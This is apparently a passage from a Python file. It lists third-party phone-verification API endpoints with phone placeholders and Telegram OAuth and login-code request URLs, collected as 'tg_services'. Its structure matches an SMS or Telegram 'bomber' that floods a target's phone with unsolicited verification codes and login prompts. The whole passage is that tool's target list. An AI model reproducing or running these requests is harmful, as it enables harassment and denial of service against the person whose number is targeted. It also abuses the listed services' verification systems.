    {"name":"megatop.by","url":"https://admin.megatop.by/api/v1/user/verify-phone","json":"{'phone':'*mt*','code':'f323ae6b9214bae1ceecfbd876a60edd'}","response":200,"timeout":60},
    {"name":"amihome.by","url":"https://amihome.by/bitrix/services/main/ajax.php?action=likeit%3Apro.api.register.createcode","data":"{'sessid':'b22504d3c451b30338d0209d2958d661','phone':'*+phone_*'}","response":200,"timeout":60}
]

tg_services = [
    "https://oauth.telegram.org/auth/request?bot_id=1852523856&origin=https%3A%2F%2Fcabinet.presscode.app&embed=1&return_to=https%3A%2F%2Fcabinet.presscode.app%2Flogin",
    "https://translations.telegram.org/auth/request",
    "https://oauth.telegram.org/auth?bot_id=5444323279&origin=https%3A%2F%2Ffragment.com&request_access=write&return_to=https%3A%2F%2Ffragment.com%2F",
    "https://oauth.telegram.org/auth?bot_id=1199558236&origin=https%3A%2F%2Fbot-t.com&embed=1&request_access=write&return_to=https%3A%2F%2Fbot-t.com%2Flogin",
    "https://oauth.telegram.org/auth/request?bot_id=1093384146&origin=https%3A%2F%2Foff-bot.ru&embed=1&request_access=write&return_to=https%3A%2F%2Foff-bot.ru%2Fregister%2Fconnected-accounts%2Fsmodders_telegram%2F%3Fsetup%3D1",
    "https://oauth.telegram.org/auth/request?bot_id=466141824&origin=https%3A%2F%2Fmipped.com&embed=1&request_access=write&return_to=https%3A%2F%2Fmipped.com%2Ff%2Fregister%2Fconnected-accounts%2Fsmodders_telegram%2F%3Fsetup%3D1",
    "https://oauth.telegram.org/auth/request?bot_id=5463728243&origin=https%3A%2F%2Fwww.spot.uz&return_to=https%3A%2F%2Fwww.spot.uz%2Fru%2F2022%2F04%2F29%2Fyoto%2F%23",
    "https://oauth.telegram.org/auth/request?bot_id=1733143901&origin=https%3A%2F%2Ftbiz.pro&embed=1&request_access=write&return_to=https%3A%2F%2Ftbiz.pro%2Flogin",
    "https://oauth.telegram.org/auth/request?bot_id=319709511&origin=https%3A%2F%2Ftelegrambot.biz&embed=1&return_to=https%3A%2F%2Ftelegrambot.biz%2F",
    "https://oauth.telegram.org/auth/request?bot_id=1803424014&origin=https%3A%2F%2Fru.telegram-store.com&embed=1&request_access=write&return_to=https%3A%2F%2Fru.telegram-store.com%2Fcatalog%2Fsearch",
    "https://oauth.telegram.org/auth/request?bot_id=210944655&origin=https%3A%2F%2Fcombot.org&embed=1&request_access=write&return_to=https%3A%2F%2Fcombot.org%2Flogin",
    "https://my.telegram.org/auth/send_password"
]
